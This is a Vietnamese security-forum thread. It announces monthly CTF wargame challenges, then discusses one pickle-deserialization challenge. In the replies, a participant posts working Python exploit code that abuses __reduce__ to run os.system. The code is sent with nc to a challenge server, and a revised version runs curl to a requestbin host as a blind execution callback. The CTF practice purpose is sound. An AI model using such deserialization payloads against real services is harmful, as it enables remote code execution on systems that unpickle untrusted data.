Thông báo update challenge WHITEHAT PLAY ! 02 (tháng 5/2018)

20/03/2017
113
356 bài viết
Thông báo update challenge WHITEHAT PLAY ! 02 (tháng 5/2018)
Thân chào các bạn thành viên,

Như đã thông báo trước, từ 16:00 h ngày 18/5/2018 WHITEHAT PLAY ! 02 (tháng 5/2018) sẽ bắt đầu update các challenge mới. Các bạn mới nghiên cứu về an ninh mạng, các quản trị hệ thống, sinh viên các trường kỹ thuật... có thể đăng nhập tại đây để bắt đầu luyện tập.
Challenge Play 02.png
Đợt thực hành trong tháng 5 này sẽ có 10 challenge mới từ tác giả Bteam và đóng góp từ cộng đồng an ninh mạng là 3 đội ReUTD, BabyParrot RC1. Thông tin chi tiết về các challenge như sau:
  • Misc: 4
  • Web Security: 1
  • Forensics: 1
  • Cryptography: 2
  • Pwnable: 1
  • Reverse Engineering: 1
Các challenge mới sẽ được định kỳ bổ sung hàng tháng. Trước khi update challenge mới, BQT WhiteHat.vn sẽ tổng kết tình hình thực hành challenge trong 1 tháng trước và vinh danh (kèm quà tặng) tới 5 đội có thành tích xuất sắc lọt vào WHITEHAT TOP PLAY. Giá trị của mỗi giải thưởng là 1 triệu đồng. Đây là món quà nhỏ mà BQT muốn gửi tặng để tôn vinh sự nỗ lực và kiên trì của các trong suốt kỳ WHITEHAT PLAY !

Các đội tham gia luyện tập cũng có thể đóng góp các challenge mới và gửi tới Ban quản trị từ menu CONTRIBUTION trên WarGame.whitehat.vn để các challenge ngày càng đa dạng và thú vị hơn.

Mọi ý kiến đóng góp xin mời các bạn trao đổi tại topic này.

Trân trọng,

BQT WhiteHat Forum

________________________

Bài viết liên quan:
 
Chỉnh sửa lần cuối bởi người điều hành:
Cho cháu hỏi bài Misc06 trong Play ! 2
theo Mô tả và Gợi ý
Pickle

OMG! Pickle again

nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,

cháu viết exploit sau
#!/usr/bin/env python

import pickle
import os

class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)


gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server

Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài này ko hiển thị kết quả phía client bạn thử thực hiện lệnh curl ra ngoài xem nó có chạy không. có thể dùng các host miễn phí trên mạng https://requestbin.fullcontact.com
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài này ko hiển thị kết quả phía client bạn thử thực hiện lệnh curl ra ngoài xem nó có chạy không. có thể dùng các host miễn phí trên mạng https://requestbin.fullcontact.com
Cháu sửa lại payload
import cPickle
import os

cmd = "curl http://requestbin.fullcontact.com/5a23as26"

class ex(object):
def __reduce__(self):
return (os.system,(cmd,))

print cPickle.dumps(ex())


gửi tới server nhưng không thấy phản hồi trên requestbin

Vẫn chưa được, chú xem payload trên sao không chạy ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn thử lại lần nữa xem sao nhé, mình test lại vẫn Oke. Bài này cho source code bạn thử khai thác local chưa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
whitehat play
Bên trên